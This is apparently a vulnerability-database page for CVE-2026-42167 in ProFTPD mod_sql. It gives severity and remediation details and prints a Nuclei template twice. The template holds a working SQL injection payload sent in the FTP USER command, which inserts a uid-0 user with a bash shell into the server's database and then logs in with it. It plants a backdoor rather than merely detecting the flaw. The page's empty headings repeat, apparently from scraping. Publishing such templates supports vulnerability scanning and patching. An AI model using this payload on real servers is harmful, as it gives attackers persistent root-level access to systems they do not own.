ProFTPD mod_sql - Preauth User Backdoor

CVE-2026-42167

Verified

Description

ProFTPD mod_sql before 1.3.10rc1 contains a remote code execution caused by unsafe username handling with SQL backend commands in USER request logging expansions, letting remote attackers execute arbitrary code, exploit requires SQL backend allowing commands.

Severity

High

CVSS Score

9.8

Exploit Probability

Affected Product

proftpd

Published Date

April 29, 2026

Template Author

pussycat0x

CVE-2026-42167.yaml

id: CVE-2026-42167

info:
  name: ProFTPD mod_sql - Preauth User Backdoor
  author: pussycat0x
  severity: high
  description: |
    ProFTPD mod_sql before 1.3.10rc1 contains a remote code execution caused by unsafe username handling with SQL backend commands in USER request logging expansions, letting remote attackers execute arbitrary code, exploit requires SQL backend allowing commands.
  remediation: |
    Upgrade to version 1.3.10rc1 or later.
  impact: |
    Remote attackers can execute arbitrary code on the server, potentially leading to full system compromise.
  reference:
    - https://github.com/ZeroPathAI/proftpd-CVE-2026-42167-poc
    - https://zeropath.com/blog/proftpd-cve-2026-42167-auth-bypass-privesc-rce
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-42167
    epss-score: 0.06463
    epss-percentile: 0.91185
    cwe-id: CWE-89
  metadata:
    max-request: 2
    verified: true
    vendor: proftpd
    product: proftpd
    shodan-query: "220 ProFTPD"
  tags: cve,cve2026,proftpd,ftp,sqli,rce,network

flow: tcp(1) && tcp(2)

tcp:
  - inputs:
      - data: "USER ', null, null); INSERT INTO users VALUES($${{randstr}}$$, $${{randstr}}$$, 0, 0, $$/$$, $$/bin/bash$$); --'\r\n"
        read: 1024
      - data: "PASS test\r\n"

    host:
      - "{{Hostname}}"
    port: 21,2121
    read-size: 1024

    matchers:
      - type: word
        part: raw
        words:
          - "220 ProFTPD"
        internal: true

  - inputs:
      - data: "USER {{randstr}}\r\n"
        read: 1024
      - data: "PASS {{randstr}}\r\n"
        read: 1024
      - data: "QUIT\r\n"

    host:
      - "{{Hostname}}"
    port: 21,2121
    read-size: 2048

    matchers-condition: and
    matchers:
      - type: word
        part: raw
        words:
          - "230"

      - type: word
        part: raw
        words:
          - "Login incorrect"
          - "Anonymous login"
        condition: or
        negative: true

    extractors:
      - type: regex
        part: raw
        regex:
          - '230.*logged in'
# digest: 4b0a004830460221009f4f4383bc043f973d6f8913a170b3a53791428f64d19adb34aad44c48528f72022100f14b9f6c8a5af0282563df27fa4a320f1a45d9398074eec69e718820a8417f53:922c64590222798bb761d5b6d8e72950

9.8Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE ID:

cve-2026-42167

CWE ID:

cwe-89

References

https://github.com/ZeroPathAI/proftpd-CVE-2026-42167-poc https://zeropath.com/blog/proftpd-cve-2026-42167-auth-bypass-privesc-rce

Remediation Steps

Upgrade to version 1.3.10rc1 or later.

id: CVE-2026-42167

info:
  name: ProFTPD mod_sql - Preauth User Backdoor
  author: pussycat0x
  severity: high
  description: |
    ProFTPD mod_sql before 1.3.10rc1 contains a remote code execution caused by unsafe username handling with SQL backend commands in USER request logging expansions, letting remote attackers execute arbitrary code, exploit requires SQL backend allowing commands.
  remediation: |
    Upgrade to version 1.3.10rc1 or later.
  impact: |
    Remote attackers can execute arbitrary code on the server, potentially leading to full system compromise.
  reference:
    - https://github.com/ZeroPathAI/proftpd-CVE-2026-42167-poc
    - https://zeropath.com/blog/proftpd-cve-2026-42167-auth-bypass-privesc-rce
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-42167
    epss-score: 0.06463
    epss-percentile: 0.91185
    cwe-id: CWE-89
  metadata:
    max-request: 2
    verified: true
    vendor: proftpd
    product: proftpd
    shodan-query: "220 ProFTPD"
  tags: cve,cve2026,proftpd,ftp,sqli,rce,network

flow: tcp(1) && tcp(2)

tcp:
  - inputs:
      - data: "USER ', null, null); INSERT INTO users VALUES($${{randstr}}$$, $${{randstr}}$$, 0, 0, $$/$$, $$/bin/bash$$); --'\r\n"
        read: 1024
      - data: "PASS test\r\n"

    host:
      - "{{Hostname}}"
    port: 21,2121
    read-size: 1024

    matchers:
      - type: word
        part: raw
        words:
          - "220 ProFTPD"
        internal: true

  - inputs:
      - data: "USER {{randstr}}\r\n"
        read: 1024
      - data: "PASS {{randstr}}\r\n"
        read: 1024
      - data: "QUIT\r\n"

    host:
      - "{{Hostname}}"
    port: 21,2121
    read-size: 2048

    matchers-condition: and
    matchers:
      - type: word
        part: raw
        words:
          - "230"

      - type: word
        part: raw
        words:
          - "Login incorrect"
          - "Anonymous login"
        condition: or
        negative: true

    extractors:
      - type: regex
        part: raw
        regex:
          - '230.*logged in'
# digest: 4b0a004830460221009f4f4383bc043f973d6f8913a170b3a53791428f64d19adb34aad44c48528f72022100f14b9f6c8a5af0282563df27fa4a320f1a45d9398074eec69e718820a8417f53:922c64590222798bb761d5b6d8e72950

ProFTPD mod_sql - Preauth User Backdoor

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

ProFTPD mod_sql - Preauth User Backdoor

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps